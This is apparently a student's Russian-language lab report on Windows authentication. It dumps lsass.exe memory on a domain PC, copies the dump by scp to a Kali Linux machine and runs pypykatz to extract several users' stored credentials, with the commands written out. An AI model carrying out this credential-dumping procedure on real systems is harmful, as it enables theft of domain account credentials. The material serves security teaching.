# Практическая работа №3 AAA в Windows.
## 3.1 Эмуляция работы пользователей на машине
В данной работе необходимо проанализировать процесс lsass.exe.
Проведем эмуляцию работы пользователей на машине. Снимем дамп процесса.
Вход под пользователем Olga на машину pc1

Обратимся к доменным ресурсам

Выйдем из учетной записи Olga

Зайдем под учетной записью Petr

Запустим командную строку от имени администратора

Пользователь Petr не обладает правами администратора, поэтому введем учетные данные ADMPetr

Проверим что мы действительно ADMPetr

Запустим диспетчер задач из командной строки, запущенной из под пользователя ADMPetr
```bash=
taskmgr
```

В подробном представлении найдем процесс lsass.exe

Создадим дамп процесса

## 3.2 Работа с Kali Linux
Войдем в Kali Linux

Настроим сетевое подключение

Запустим консоль

Повысим привилегии через
```bash=
sudo -i
```

Включим сервис ssh
```bash=
systemctl start ssh
```

Передадим дамп процесса lsass с машины pc1 на машину с Kali Linux
```bash=
scp C:\Users\ADMPetr\AppData\Local\Temp\lsass.DMP kali@192.168.10.203:/home/kali
```
Подтверждаем передачу файла и вводим пароль Kali Linux

Файл передан

Проверим что файл передан
```bash=
ls /home/kali
```

Перейдем в директорию с дампом lsass
```bash=
cd /home/kali
```
И скачаем скрипт pypykatz
```bash=
git clone https://github.com/skelsec/pypykatz
```

Для анализа файла дампа перейдем в каталог pypykatz выполним команду
```bash=
cd pypykatz
pypykatz lsa minidump /home/kali/lsass.DMP
```
Получаем анализ дампа, который содержит аутентификационные данные различных пользователей


